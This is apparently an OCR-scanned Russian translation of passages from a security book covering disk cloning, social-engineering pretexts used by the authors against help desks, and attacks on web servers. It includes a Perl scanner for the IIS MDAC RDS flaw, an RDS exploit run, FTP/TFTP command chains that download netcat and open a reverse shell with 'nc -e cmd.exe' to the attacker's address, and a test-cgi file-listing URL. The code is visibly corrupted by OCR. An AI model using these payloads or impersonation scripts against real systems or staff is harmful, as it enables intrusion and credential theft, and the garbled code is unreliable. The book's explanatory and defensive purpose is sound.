    http: //www.logicube.com
    Клонирование дисков
    Drive Image FlashClone Norton Ghost RapiDeploy
    http: //www.powerguest .com 
    http: //www.ics-iq.com 
    http: //www.symantec .com 
    http: //www.altiris .com
    Работа с виртуальными дисками, защищенными от записи
    VMWare
    http://www.vmware.com
    Восстановление системы
    9Lives (Win Bx only) SecondChance (только Win 9x)
    http://www.duomark.com/9Lives 
    http: //www.powerquest.com

    Контрмеры



    Физическая безопасность всегда должна быть во главе списка защитных мероприятий любой информационной системы. Двери с надежными замками могут предотвратить атаки, направленные на копирование или клонирование системных данных.
    Положение становится более серьезным при взломе, при котором злоумышленники пользуются приложением, ранее приобретенным самой компанией. Надежные приложения должны быть основаны на технологиях, которые никак не связаны с функционированием системных компонентов, обеспечивающих возможность использования списка процессов, файловой системы или других данных, которые могут быть легко воспроизведены с помощью средств создания образа системы. Если производители программного обеспечения не спешат делиться техническими подробностями и обосновывать надежность своих программ, лучше поискать какую-нибудь альтернативу.


    6. Социальная инженерия



    Социальная инженерия


    Последний раздел этой главы посвящен методу, наводящему наибольший ужас на тех, кто отвечает за сохранность информации,— социальной инженерии (social engineering). Хотя этот термин прочно закрепился в хакерском жаргоне, обозначая метод убеждения и/или обмана сотрудников какой-либо компании для получения доступа к ее информационным системам, мы считаем его неудачным. Такие приемы обычно применяются в процессе обычного человеческого общения или при других видах взаимодействия. В качестве технических средств обычно выбирается телефон, но попытка наладить общение может быть предпринята и через электронную почту, коммерческие каналы телевидения или другие самые разнообразные способы, позволяющие вызвать нужную реакцию. Успешному взлому с применением социальной инженерии, как правило, предшествуют следующие стандартные подходы.

    Необразованный пользователь и "справочный стол"



    Однажды авторы, проявив достаточную настойчивость, просмотрели списки контактных данных сотрудников компании, адреса электронной почты и номера телефонов внутренней телефонной сети одной компании. Все это оказалось возможным благодаря обращению к "справочному столу" этой компании.
    Сначала мы собрали информацию о сотрудниках этой компании, используя некоторые из методов поиска в открытых источниках (см. главу 1). Очень ценные данные посчастливилось раздобыть у компании-регистратора доменных имен Network Solutions по адресу http://www.networksolutions.com. Здесь были обнаружены данные директора отдела информационных технологий.
    Имени этого человека и его телефонного номера, полученных в компании-регистраторе, оказалось вполне достаточно, чтобы приступить к атаке, которую можно назвать "удаленный пользователь, попавший в затруднительное положение". Для прикрытия мы воспользовались следующей легендой: у директора отдела информационных технологий, который пребывает в командировке по делам фирмы, возникли трудности. Ему срочно нужно получить некоторые файлы Power Point для презентации, которая состоится завтра. С помощью такого трюка от служащих "справочного стола" нам удалось узнать версию клиентского программного обеспечения удаленного доступа (которую можно бесплатно получить на Web-узле производителя), ее конфигурационные параметры, бесплатный номер телефона для дозвона на сервер удаленного доступа и учетную запись для регистрации на этом сервере. Установив первоначальный доступ, мы перезвонили несколько часов спустя (выдав себя за того же пользователя!) и объяснили, что забыли пароль почтовой учетной записи. Пароль был восстановлен. Теперь можно было отправлять почту, пользуясь внутренним почтовым ящиком компании.
    Затем с использованием нескольких звонков удалось получить доступ к внутренней телефонной сети компании. Код доступа к этой сети дал возможность пользоваться исходящими телефонными звонками в любую точку земного шара за счет компании. Позже было установлено, что сервер удаленного доступа имеет пустой пароль в учетной записи администратора, к которой можно получить доступ с помощью полученного ранее номера бесплатного дозвона. Нет необходимости говорить, что в течение нескольких часов был установлен полный контроль над сетью этой организации (причем большая часть этого времени прошла в ожидании ответных звонков из "справочного стола"). И все это было проделано только с помощью социальной инженерии.

    "Справочный стол" и растерянный пользователь



    В предыдущем примере было интересно наблюдать за тем, какое гипнотизирующее влияние маска руководителя оказала на стоящих на более низком уровне сотрудников "справочного стола". Однако в некоторых компаниях, где технические знания персонала "справочного стола" дают им возможность получать от сотрудников любую информацию, этот метод можно применить несколько по-другому и добыть сведения от ничего не подозревающих пользователей. Однажды, найдя на одном из Web-узлов список внутренних телефонов компании и представляясь работником отдела внутренней технической поддержки, авторы начали обзванивать сотрудников, выбирая телефоны случайным образом. Таким образом удалось получить информацию об именах пользователей и паролях доступа к внутренним файлам, а также некоторые общие сведения о локатьной сети. Эту информацию предоставляли 25% из тех, кому звонили. Выдавая себя либо за директора отдела информационных технологий, либо за сотрудника группы технической поддержки можно с высокой эффективностью извлекать необходимые данные.

    Контрмеры



    В этой главе описаны самые разнообразные атаки. Некоторые из них выглядят безграничными в своих проявлениях, и кажется, что их очень трудно предотвратить (например, поиск информации в открытых источниках Internet). Хотя противодействовать всем атакам с применением социальной инженерии почти невозможно, мы постарались все же сформулировать некоторые рекомендации, которые могут оказаться эффективными.

    •  Ограничение утечки данных. Web-узлы, общедоступные базы данных, компании-регистраторы, "желтые страницы" и другие источники информации должны содержать лишь общие сведения, такие как корпоративные номера телефонов и официальные должности вместо имен сотрудников (например, "Администратор зоны" вместо "Джон Смит").
    •  Выработка строгой политики выполнения процедур внутренней и внешней технической поддержки. Перед тем, как получить поддержку, каждый позвонивший должен сообщить свой идентификационный номер служащего или пройти идентификацию в любой другой форме. Сотрудники группы поддержки должны предоставлять помощь в строго определенных рамках и не должны отвечать на вопросы, связанные с используемыми внутренними технологиями. Нужно также определить те непредвиденные ситуации, в которых можно выходить за рамки этих требований.
    •  Проявление особой бдительности в вопросах, касающихся удаленного доступа. Следует помнить, что подобная привилегия повышает производительность работы не только сотрудников фирмы, но и взломщиков. Советы, касающиеся обеспечения безопасности удаленных соединений можно найти в главе 9.
    •  Тщательная настройка как исходящего, гак и входящего трафика брандмауэров и маршрутизаторов. Это поможет предотвратить, например, вовлечение пользователей в процесс совместного использования внешних файлов. Здесь отлично сработает хорошее правило очистки (последним правилом каждого списка управления доступом должен быть полный запрет, т.е. каждому пользователю запрещен доступ к файлам всех остальных)
    •  Безопасное использование электронной почты. Если кто-нибудь сомневается в важности этого правила, ему стоит прочитать главу 16. Следует научиться прослеживать маршрут прохождения почтового сообщения с помощью анализа его заголовка (на Web-узле http://spamcop.net в разделе часто задаваемых вопросов можно найти информацию о настройке почтовых клиентских приложений так, чтобы заголовки отображались полностью).
    •  Повышение уровня образованности сотрудников фирмы в вопросах обеспечения безопасности. Нужно выработать политику безопасности и распространить ее внутри всей организации. Для разработки такой политики в качестве отправной точки прекрасно подойдет документ RFC 2196, The Site Security Handbook. К нему следует добавить также RFC 2504, The Users' Security Handbook, с которым в настоящее время нужно познакомиться всем пользователям Internet. Оба документа можно найти на Web-узле http://www.rfc-editor.org.



    7. Резюме



    Резюме



    В этой главе вы познакомились со способами захвата соединений TCP в сети с множественным доступом, а также с тем, как взломщики могут получить доступ к системе,, передавая команды для локального выполнения или путем перехвата соединения. Эти типы атак очень просто реализовать в сетях с множественным доступом и так же просто предотвратить при переходе к сети с коммутацией пакетов.
    Вы узнали также о том, какие шаги следует предпринять, если в сеть проник злоумышленник. Избавиться от его присутствия очень трудно, однако это все же вполне осуществимая задача. Ее можно решить с использованием рекомендаций, приведенных в данной главе. Ниже перечислены основные аспекты этих советов. Тем не менее, лучше всего заново переустановить все программы, воспользовавшись проверенными носителями.

    •  Проверяйте привилегии учетных записей и принадлежность к группам. Удаляйте любую подозрительную учетную запись, и сведите к минимуму число привилегированных пользователей.
    •  Очищайте загрузочные файлы конфигурации от подозрительных записей. Эти файлы являются основным местом, где после создания "потайного хода" остаются следы, поскольку большинство взломщиков стремятся к сохранению возможности войти в систему и после ее перезагрузки.
    •  Не забывайте о том, что такие службы планирования заданий, как AT системы NT/2000 и сгоп в UNIX также могут быть использованы для запуска демонов, обеспечивающих "потайной ход", даже если система не часто перезагружается. Постоянно следите за списком заданий, которые выполняются по расписанию.
    •  Познакомьтесь с самыми популярными инструментами создания "потайных ходов", такими как Back Orifice и Net Bus. Это позволит получить представление об особенностях функционирования этих продуктов, которые позволят обнаружить их присутствие в системе. Серьезно подойдите к вопросу приобретения антивирусных или других "чистящих" программных продуктов, осуществляющих активное сканирование и помогающих решить такие проблемы.
    •  Будьте предельно осторожны при запуске исполняемых файлов, полученных из ненадежных источников. Кто знает, какие зловредные утилиты при этом могут быть незаметно установлены? Программы типа "троянский конь" идентифицировать очень трудно, а последующая переустановка системы является не очень приятным занятием. Применяйте средства обнаружения таких программ, утилиты подсчета контрольных сумм, такие как MDSsum или Tripwire. Это позволит удостовериться в подлинности используемых файлов, особенно системных, которые используются при регистрации в системе.
    •  Чтобы узнать, как Web-броузеры и почтовые программы могут стать переносчиками программ типа "троянский конь", прочитайте главу 16.

    И наконец, вы узнали о социальной инженерии и ее возможностях по нарушению системы обеспечения безопасности организации. Как сказано в документе RFC 2504, "Паранойя — это очень хорошо". Убедитесь, что каждый, кто работает с важными данными, осознает свою ответственность.


    Глава 15. Уязвимость в Web



    Глава 15. УЯЗВИМОСТЬ В WEB




    1. Уязвимость в Web



    Уязвимость в WEB


    Тысячи компаний осознали, что всемирная паутина Web является мощным средством распространения информации, расширения торговли, улучшения качества обслуживания и поддержки постоянного контакта с заказчиками и клиентами. И хотя большинство организаций для защиты своих интересов и вложений предусмотрительно использует фильтрующие маршрутизаторы, брандмауэры и системы выявления вторжений, когда речь заходит об изъянах Web, многие из этих мер предосторожности могут оказаться бесполезными. Почему? Большинство из обсуждаемых в этой главе атак реализуется через порты Web (80, 81, 443, 8000, 8001, 8080 и т.д.). Хотя их не так много, обычно они открывают доступ в сегмент сети, доступный из Internet. Некоторые читатели, дочитавшие главу до конца, удивятся, узнав, каким грозным орудием может оказаться Web-броузер в руках взломщика.
    Конечно же, в некоторых случаях для уменьшения риска можно предпринять определенные действия, но большинство брешей в системе зашиты можно закрыть лишь с помощью качественного программирования, соблюдения строгой логики программ и управления потоками данных. Все эти меры должны сопровождаться ежедневным мониторингом систем, что обычно требует огромных усилий и скрупулезности. Как всегда, по возможности будут предлагаться контрмеры, которые следует предпринять для предотвращения каждой из описанных атак. Сначала речь пойдет о самых простых методах, а затем и о более сложных.


    2. Воровство в Web



    Воровство в Web


    В главе 1 описан предварительный сбор данных, позволяющий получить максимально полную информацию об отдельном узле или обо всей сети в целом. Воровство в Web преследует практически ту же цель. В поисках информации взломщики вручную просматривают Web-страницы, стараясь найти недостатки в коде, зацепки в комментариях и дизайне. В этом разделе приведено несколько способов такого сбора информации о Web-сервере. В число этих методов входит последовательный просмотр страниц вручную, применение сценариев автоматизации и коммерческих программ.

    Последовательный просмотр страниц



    Один из давно известных способов получения данных заключался в прохождении всего Web-узла вручную, просматривая в броузере исходный код каждой страницы. В документах HTML можно найти огромное количество информации, включая ценные комментарии, адресованные другим разработчикам, адреса электронной почты, номера телефонов, программы JavaScript и многое другое. Например, задав в броузере адрес какого-нибудь сервера и выбрав команду View^Page Source, можно увидеть исходный код HTML (рис. 15.1).



    Рис. 15.1. Исходный код HTML может содержать много важной информации. Зачастую в нем содержится структура каталогов, номера телефонов, имена и адреса электронной почты разработчиков Web-страниц

    Упрощай!



    К крупным Web-узлам (содержащим более 30 страниц) большинство взломщиков применяют автоматизированный подход, используя специальные сценарии или утилиты. Сценарии можно писать на различных языках, однако авторы отдают предпочтение языку Perl. С помощью несложных программ на этом языке можно перемещаться по Web-серверу, осуществляя поиск определенных ключевых слов.
    Для копирования данных такого типа разработано также несколько коммерческих программ как для системы UNIX, так и для NT. Наиболее популярной является утилита Teleport Pro для NT, разработанная компанией Tennyson Maxwell Information Systems (http://www.tenmax.com), диалоговое окно которой показано на рис. 15.2. Эта программа позволяет отобразить целый Web-узел на локальный компьютер для дальнейшего ознакомления.
    Для более подробного анализа файлов, удовлетворяющих критерию поиска, можно загрузить их локально. Например, если нужно найти Web-страницы, которые содержат определенные ключевые слова (пусть даже в исходном коде HTML), такие как email, contact, user*, pass*, updated и так далее, то это можно осуществить с помощью утилиты Teleport Pro. При этом поиск по любому из этих слов можно вести только в файлах определенного типа, например *.htm. *.html, *.shtm, *.shtml, *.txt. '.cfm и т.д. На следующем рисунке показано, как в программе Teleport Pro задать тип файлов, в которых следует осуществлять поиск.



    Рис. 15.2. Программа Tclepon для системы NT

    Эта программа позволяет задавать также слова, которые необходимо найти.
    Как только нужные Web-страницы будут скопированы на локальный компьютер, взломщик сможет приступить к их исследованию. При этом он будет изучать каждую страницу HTML, каждый графический файл, панель управления и встроенные сценарии, стараясь разобраться с архитектурой исследуемого Web-узла. Эти сведения впоследствии могут оказаться очень полезными.

    Контрмеры против воровства в Web



    1. Регулярно анализируйте содержимое журналов регистрации и следите за повышением количества запросов GET, поступающих из одного и того же источника.
    2. Используйте сценарий garbage.cgi, выдающий нескончаемый поток случайных данных в том случае, если какая-нибудь автоматическая программа начнет исследование узла и будет запускать сценарии CGI. Конечно, с помощью утилиты Teleport Pro эту проблему можно обойти, но взломщикам по крайней мере придется хорошо потрудиться.


    1.gif

    Изображение: 

    2.gif

    Изображение: 

    3. Поиск известных изъянов



    Поиск известных изъянов


    Как всегда, особое внимание следует уделять очевидным брешам в системе защиты. Это необходимо в основном потому, что и хакеры обращают на них внимание в первую очередь. Несколько разрушительных изъянов Web существует до сих пор, хотя о них стало широко известно еще несколько лет назад. Отличительной особенностью атак этого типа является то, что многие из них легко обнаружить.

    Сценарии автоматизации, применяемые новичками



    В данный момент как никогда уместна фраза "Пусть друзья будут рядом, а враги — еще ближе". Используемые в основном начинающими взломщиками, сканирующие сценарии (чаще всего написанные известными хакерами) зачастую могут помочь в обнаружении некоторых известных изъянов. Многие средства поиска таких брешей можно найти на Web-узле компании Technotronic (www.technotronic.com).

    Phfscan.c



    Изъян PHF (более подробно описанный ниже) был одной из первых применяемых для взлома брешей в сценариях Web-серверов. Этот изъян позволяет взломщику локально запускать любую команду, как если бы он был пользователем Web-сервера. Часто это приводит к тому, что файл паролей /etc/passwd оказывается загруженным на компьютер взломщика. В выявлении такого изъяна как администратору, так и хакеру, может помочь несколько программ и сценариев. Программа pfhscan.c является одной из наиболее популярных. Перед использованием ее нужно откомпилировать (gcc phfscan.c -о phfscan), подготовить список узлов, которые нужно просканировать (для создания такого списка подойдет утилита gping), назвать файл со сгенерированным списком host.phf и поместить его в один каталог с программой. После запуска двоичного файла (phfscan) программа начнет выдавать предупреждения о найденных уязвимых серверах.

    cgiscan.c



    cgiscan — это удобная небольшая утилита, созданная в 1998 году Бронком Бастером (Bronc Buster). Она предназначена для сканирования узлов и поиска среди них тех, которые подвержены старым изъянам, таким как PHF, count, cgi, test-cgi, PHP, handler, webdist.cgi, nph-test-cgi и многих других. Программа осуществляет поиск уязвимых сценариев в тех каталогах, где они обычно находятся, и пытается ими воспользоваться. Результат работы утилиты выглядит примерно следующим образом.

    [root@funbox-b ch!4]# cgiscan www.somedomain.com
    New web server hole and info scanner for
    elite kode kiddies coded by Bronc
    Buster of LcF - :iov 1998 updated Jan 1999
    Getting HTTP version
    Version:
    HTTP/1.1 200 OK
    Date: Fri, 16 Jul 1999 05:20:25 GMT
    Server: Apache/1.3.6 (UNIX) secured_by_ Raveri/1. 4 . 1
    Last-Modified: Thu, 24 Jun 1999 22:25:11 GMT
    ETag: "17d007-2a9c-3772bC47"
    Accept-Ranges: bytes
    Content-Length: 10908
    Connection: close
    Content-Type: text/html
    Searching for phf :.. No:.E'our.rf..
    Searching for Count.cgi :..Not Found.
    Searching for test-cgi :..Nc:Found..
    Searching for php.cgi :..Nov.Found.
    Searching for handler :..NotFound..
    Searching for webgais :..Not Found..
    Searching for websendmail:..Not Found..
    Searching for webdist.cgi:..Not Found..
    Searching for faxsurvey:..Not Found..
    Searching for htmlscript:..Not Found..
    Searching for pfdisplay:..Not Found..
    Searching for perl.exe:..Not Found..
    Searching for wwwboard.pl:. Not Found..
    Searching for www-sql:..Not Found..
    Searching for service.pwd:..Not Found..
    Searching for users.pwd:..Not Found..
    Searching for aglimpse:..Not Found..
    Searching for man.sh :..Not Found..
    Searching for view-source:..Not Found..
    Searching for campas :..Not Found..
    Searching for nph-test-cgi :..Not Found..
    [gH] - aka gLoBaL hElL - are lame kode kiddies

    В Internet можно найти десятки сценариев, предназначенных для сканирования. На узле http://www.hackingexposed.com/ содержатся ссылки на самые популярные Web-узлы, на которых содержится самая разнообразная информация по вопросам безопасности.


    4. Приложения автоматизации



    Приложения автоматизации


    В Internet можно найти несколько приложений, предназначенных для автоматизированного поиска хорошо известных изъянов или тех из них, которые становятся доступными при использовании в процессе установки программного обеспечения параметров, предлагаемых по умолчанию. В отличие от сценариев, эти средства используются вручную. Это не позволяет использовать их в больших корпоративных сетях, зато они успешно применяются в малых сетях и на серверах, на которые нужно обратить более пристальное внимание.

    Grinder



    Программа Grinder версии 1.1 (http://hackersclub.com/km/files/hfiles/ rhino9/grinderll .zip), поддерживает интерфейс Win32 и позволяет сканировать IP-адреса из заданного диапазона. Результатом ее работы является отчет, в котором содержится название и версия Web-сервера. Это ничем не отличается от применения обычной команды HEAD (например, утилиты netcat), однако в процессе сканирования программой Grinder создается несколько параллельных сокетов, поэтому она работает намного быстрее. На рис. 15.3 показано, как Grinder выполняет сканирование и определяет версии Web-серверов.
    Другим средством определения версий Web-серверов являются сканирующие сценарии для системы UNIX. Если в файле портов указан порт 80, то команда HEAD будет передана на Web-сервер по умолчанию, в результате чего в ответном сообщении будет содержаться название и номер версии запущенного программного обеспечения. Эта информация будет помещена в файл <UMX>/<UMX>.http.d\mip. Для того чтобы начать процесс сканирования, можно воспользоваться следующим синтаксисом. ./unixscan.pl hosts.txt ports.txt test -p -z -г -v



    Рис. 15.3. Программа Grinder может оказаться полезной при одновременном поиске многих Web-серверов и определении версий применяемого программного обеспечения

    После завершения работы сканера будет создан файл, содержащий отчет о версии Web-сервера.

    172.29.11.82 port 80: Server: Microsoft-IIS/4.0
    172.29.11.83 port 80: Server: Microsoft-IIS/3.0
    172.29.11.84 port 80: Server: Microsoft-IIS/4.0

    SiteScan



    Программа' SiteScan, написанная Хамелеоном (Chameleon) из групп Rhino9 и InterCore, позволяет выполнить более глубокое исследование, чем Grinder, проверяя наличие таких определенных изъянов, как PHF, PHP, finger, test.cgi и другие. Это графическое приложение Win32 за один раз может исследовать только один IP-адрес, поэтому ее нельзя включать в сценарии. Придется каждый раз вручную вводить IP-адрес и просматривать полученный результат.


    5.gif

    Изображение: 

    5. Несоответствие сценариев требованиям безопасности: взлом при отсутствии проверки ввода



    Несоответствие сценариев требованиям безопасности: взлом при отсутствии проверки ввода


    Причиной взлома при отсутствии проверки ввода с использованием общего интерфейса шлюза (CGI — Common Gateway Interface), активных страниц сервера (ASP — Active Server Pages) и языка разметки CFML (Cold Fusion Markup Language), является промах либо разработчика, либо поставщика программного обеспечения. Основная проблема возникает из-за недостаточной обработки входных данных некоторого сценария. Если не позаботиться о проверке достоверности и последующей очистке входных данных, взломщик сможет передать сценарию нужный символ, скажем, локальную команду, в качестве параметра и таким образом локально запустить эту команду на Web-сервере.

    Изъян MDAC RDS IIS 4.0



    Вскоре после того, как компания Microsoft справилась с проблемой, вызванной программой iishack, работа которой приводила к переполнению буфера сервера IIS (это произошло в июне 1999 года), в июле ей пришлось столкнуться с другой проблемой, связанной с Web-сервером. Данная проблема была описана в бюллетене компании Microsoft, посвященном вопросам безопасности, еще в 1998 году, но стала известна широкой общественности лишь в последнее время. Этот изъян возникает из-за недостатка одного из компонентов Microsoft доступа к данным (MDAC — Microsoft Data Access Components) службы RDS (Remote Data Service), который позволяет взломщику запускать любые команды на уязвимом сервере.
    Первопричина проблемы заключается в объекте DataFactory службы RDS. По умолчанию он позволяет передавать удаленные команды серверу I1S. В этом случае команды запускаются с правами эффективного пользователя этой службы, которым обычно является пользователь SYSTEM (внутренний пользователь, обладающий привилегиями администратора). Это означает, что взломщик может получить удаленный доступ с правами администратора к любому серверу в мире', у которого имеется такой изъян.
    Для проверки этой концепции компания Rain.forest.puppy разработала свой сценарий на языке Perl (его можно загрузить с Web-узла компании Security Focus http://vww.securityfocus.com), посылающий запрос RDS в базу данных, которая служит в качестве образца и называется btcustmr.mdb. Целью запроса является запуск на сервере команды, вводимой пользователем.
    Поиск уязвимых серверов в сети представляется простой задачей. Посмотрим, как можно обнаружить компоненты MDAC службы RDS. С помощью утилиты netcat и языка Perl можно просканировать подсети в поисках признаков уязвимого сервера — наличия динамически подключаемой библиотеки msadcs.dll. Если в результате обработки HTML-запроса будет получена строка appiication/x-varg, значит, высока вероятность того (хотя и не на 100%), что данная система уязвима. Ниже для примера приведен код на языке Perl, с помощью которого можно обнаружить данный изъян.

    #!/usr/bin/perl
    if ($|ARGV < 0) {
    print "Ошибка в синтаксиме - попробуйте eщe pas.";
    print ": mdac.pl 10.1.2.3-255";}
    doit($ARGV[0]); foreach $item (@hosts)
    { portscan($item); }
    close OUTFILE;
    sub doit { $line = $_[0];
    if ($line!=/#/) {
    if ($line=~/-/) {
    Stmp = split/-/, $line;
    Ship = split//, $tmp[0];
    @eip = split//, $tmp[lj;
    } else
    {
    @bip = split//, $line;
    @eip = split//, $line; }
    $al = $bip[0];
    $bl = $bip[l];
    $cl = $bip[2];
    $dl = $bip[3];
    Snum = @eip; if ($num==l)
    { $a2 = $bip[0]
    $b2 = $bip[l]
    $c2 = $bip[2]
    $d2 = $eip[0]
    } elsif
    ($num==2)
    {$a2 = $bip[0]
    $b2 = $bip[l]
    $c2 = $eip[0]
    $d2 = $eip[l] }
    elsif
    ($num==3)
    {
    $a2 = $bip[0]
    $b2 = $eip[0]
    $c2 = $eip[l]
    $d2 = $eip[2]
    } elsif
    ($num== )
    {
    $a2 = $eip[0]
    $b2 '-= $eip[l]
    $c2 = $eip[2]
    $d2 = $eip[3] }
    # Ha базк IP-адреса подсети (класс A, B, C)задаем
    # корректные значения переменных.
    check_end(); $aend=$a2;
    # Создание массива.
    while
    ($al < $aend)
    ( while ($bl < $bend)
    { while ($cl < $cend)
    { while ($dl < Sdend) {
    push (@hosts, "$al.$bl.$cl.$dl">;
    $dl+=l;
    check_end();
    }
    $cl+=l;
    $dl=0;
    }
    $bl+=l;
    $cl=0;
    }
    $al+=l; $bl=0; } } }
    sub portscan ( my $target = $_[0];
    print "Сканируется порт $target."; local $/;
    open(SCAN,"nc -vzn -w 2 $target 80 2»
    &1I");
    # Порт открыт
    $result = <SCAN>;
    if ($result=~/open/)
    {
    print "\tПорт 80 Ha $target открыт . \n";
    print OUTFILE "порт 80 открыт\n";
    open (HTTP, ">http.tmp");
    print HTTP "GET /msadc/msadcs.dll HTTP/1.0\n\n";
    close HTTP;
    open(SCAN2, "type http.tmp I nc -nvv -w 2 $target 80 2>&1 I");
    $result2 = <SCAN2>;
    if (Sresult2=~/Microsoft-IIS4.07)
    {
    if ($result2=~/x-varg/){
    print "
    $target уязвима против атаки MDAC.";
    print OUTFILE "$target
    может быть уязвима против атаки &MDAC.";
    }
    }
    close SCAN;
    }
    }
    sub check_end
    {
    if (($al==$a2) &S ($bl==$b2) &
    s ($cl==$c2)) {
    $dend=$d2; }
    else {
    $dend=255; }
    if (($al==$a2) &&
    ($bl==$b2)) {
    $cend=$c2; }
    else {
    $cend=255; }
    if ($al= =$a2)
    {
    $bend=$b2; - }
    else {
    $bend=255;
    }
    }

    При использовании параметра -n команды netcat требуется, чтобы в командной строке явно указывался IP-адрес

    "Анатомия" атаки



    Сценарий Perl можно найти на многих Web-узлах, в том числе в архиве NTBugtraq (http://www.ntbugtraq.com) или на узле компании Security Focus (http://www.securityfocus.com). Он работает одинаково эффективно как в системе UNIX, так и в NT, и предпринимает попытку установить связь с компонентами MDAC, чтобы добавить в запрос SQL строку | shell ($command) |. Когда компонент MDAC достигает команды shell, выполняется команда, заданная в переменной $ command. Для того чтобы убедиться в наличии описанной возможности, попробуйте запустить команду со следующим синтаксисом.

    C:\>perl mdac_exploit.pl -h 192.168.50.11
    -- RDS exploit by rain forest puppy/ADM/Wiretrip--
    Command: <run your command here>
    Step 1: Trying raw driver to btcustmr.mdb
    winnt -> c: Success!

    Разработка корректной команды для системы NT — непростая задача. Сомил Шах (Somil Shah) и Нитеш Даньяни (Nitesh Dhanjani) вместе с Джорджем Куртцом (George Kurtz) разработали интересную последовательность команд, которые можно загрузить с помощью TFTP или по FTP. В результате будет загружена и запущена утилита netcat, возвращающая обратно командную оболочку системы NT (cmd.exe). Например, с использованием средств FTP можно воспользоваться следующей последовательностью команд,

    "cd SystemRoot £& echo $ftp_user>ftptmp
    && echo $ftp_pass»ftptmp
    && echo bin»ftptmp &&
    echo get nc. exe»ftptmp
    &£ echo bye»ftptmp &£
    ftp -s:ftptmp $ftp_ip &&
    del ftptmp &&
    attrib -r nc.exe && nc
    -e cmd.exe $my_ip $my_port"

    При использовании TFTP аналогичные команды будут выглядеть следующим образом,

    "cd\%SystemRoot\%
    &&tftp-i $tftp_ip GET nc.exe nc.exe &S
    attrib
    -r nc.exe && nc -e cmd.exe $my_ip $my_port"

    Применение этих команд в сценарии Perl позволит вернуть командную оболочку удаленной системы, с помощью которой можно будет загрузить любое количество файлов, включая утилиту pwdump.exe (позволяющую получить хэш-коды из базы данных SAM), а затем приступить к взлому с применением утилит L0phtcrack или John vl.6. Если команда оказалась неработоспособной, то, не исключено, что на пути к порту TCP (FTP) с номером 21 или порту UDP (TFTP, 69) целевой системы находится маршрутизатор или брандмауэр.

    Контрмеры: защита компонентов МDАС службы RDS



    Для того чтобы предотвратить такие атаки, либо удалите все файлы, используемые в этом случае, либо измените конфигурационные параметры сервера. 

    Изъяны CGI



    По-видимому, после переполнения буфера плохо написанные сценарии CGI являются наиболее опасными изъянами в Internet. В электронном мире еще можно найти Web-серверы, разработчики которых экономили время на программировании, а после того, как взломщик пробрался на сервер и навел там свои порядки, пожалели о своей спешке. В этом разделе описано несколько наиболее популярных изъянов сценариев CGI, а также последствия, к которым приводит их использование.

    Сценарии PHF



    Возможно, одним из наиболее старых и в наши дни редко встречающихся изъянов является сценарий PHF, который изначально применялся на серверах HTTPD центра NCSA (версия 1.5А-Export или более ранние) и сервера Apache (версии 1.0.3). Эта программа CGI является примером сценария, обеспечивающего интерфейс в виде форм, который можно использовать для поиска имен и адресов в адресной книге. Из-за того что в этом сценарии для проверки входных данных используется функция escape_shell_cmd(), он оказывается уязвимым для широко распространенной атаки, при которой обманным путем удается локально запускать команды. Символ новой строки (0х0а в шестнадцатеричной системе счисления) не проверяется при контроле правильности входных данных. Поэтому он может быть использован для прерывания выполнения сценария и запуска любой команды, указанной после этого символа, в локальном контексте Web-сервера. Например, введение следующего адреса URL приведет к извлечению файла паролей, если пользователь, запустивший Web-сервер, обладает правами доступа к этому файлу.

    Контрмеры: защита сценариев РНР


    Предотвращение



    Лучше всего удалите этот сценарий с Web-сервера. Скорее всего, на рабочем сервере такой сценарий не требуется.

    Обнаружение



    Средства обнаружения атак, направленных на использование изъяна PHF, встроены почти в каждую бесплатную или коммерческую систему выявления вторжений, так что в этом случае решить проблему безопасности будет несложно.

    С помощью программы phfprobe.pl можно привлечь взломщиков к своему Web-узлу и зафиксировать выполняемые ими действия. В процессе анализа полученных данных можно лучше продумать стратегию защиты. Данная программа Perl служит в качестве приманки, имитирующей сценарий PHF. Она отправляет взломщикам такие ответные сообщения, как будто предпринимаемые ими действия выполняются успешно. На самом же деле осуществляется сбор информации о взломщиках и их тактике. Эту ловушку следует применять только при полной уверенности в надежности системы.

    Изъяны CGI системы Irix



    Первое сообщение об изъяне CGI системы Irix появилось в 1997 году в бюллетене Bugtraq. Новость опубликовал Разван Драгомиреску (Razvan Dragomirescu). Он обнаружил, что в состав подсистемы Outbox Environment многих систем Irix входит несколько программ, уязвимых для взлома при отсутствии проверки ввода. Сценарий webdist.cgi, а также сценарии-оболочки систем Irix 5.x и 6.x позволяют взломщикам передавать локальные команды и запускать их на удаленном узле. 

    Контрмеры против использования изъянов CGI систем Irix



    Как и раньше, если сценарий не применяется, лучше всего удалить его из системы и тем самым предотвратить возможность использования его изъянов. Если же удалить сценарий невозможно, воспользуйтесь модулем обновления SGI, который можно найти по адресу http://www.sgi.com/support/patch_intro.html.

    test-cgi



    Впервые об этом изъяне широкой общественности сообщила группа L0pht в 1996 году. С его использованием взломщик может удаленно получать информацию о файлах, которые имеются на целевом узле. Например, используя следующий URL, взломщик может просмотреть список всех файлов и каталогов, которые содержатся в каталоге сценариев (egi -bin).

    http://192.168.51.101/cgi-bin/test-cgi?*

     В результате на экран будет выведено значение переменной окружения QUERY_STRING.

    QUERY_STRING = count.cgi createuser.pl nph-test-cgi phf php.cgi
    search.pl
    test-cgi wwwcount.cgi

    Конечно же, получение перечня имеющихся в системе сценариев поможет взломщику найти другие слабые места, через которые можно будет получить доступ к Web-серверу, например PHF, PHP и т.д. Эта информация откроет взломщику доступ к удаленному узлу с правами пользователя или даже суперпользователя, а впоследствии он добьется контроля над всей системой UNIX.

    Контрмеры против использования изъянов ССI



    Если обычное решение проблемы (удаление сценария) по каким-либо причинам реализовать нельзя, стоит обратиться к некоторым ресурсам Internet, в которых можно найти советы по безопасному написанию сценариев.


    6. Уязвимость активных страниц сервера



    Уязвимость активных страниц сервера



    Активные страницы сервера (ASP — Active Server Pages) представляют собой разработку компании Microsoft, аналогичную сценариям Perl и интерфейсу CG1 системы UNIX. Обычно написанный на языке VBScript, код ASP выполняет многое из того, что необходимо для поддержки состояния, обеспечения доступа к серверной части базы данных и отображения кода HTML в окне броузера. Одной из приятных особенностей страниц ASP является то, что они могут "на лету" генерировать страницы HTML. Другой малоприятной особенностью являются многочисленные изъяны страниц ASP, позволяющие взломщику просматривать их исходный код. Почему это плохо? Во-первых, потому, что взломщик, изучая логику программы, может обнаружить и другие изъяны. Во-вторых, он может найти в этих файлах такую важную информацию, как база данных имен и паролей пользователей.

    Ошибка ASP, связанная с интерпретацией точки



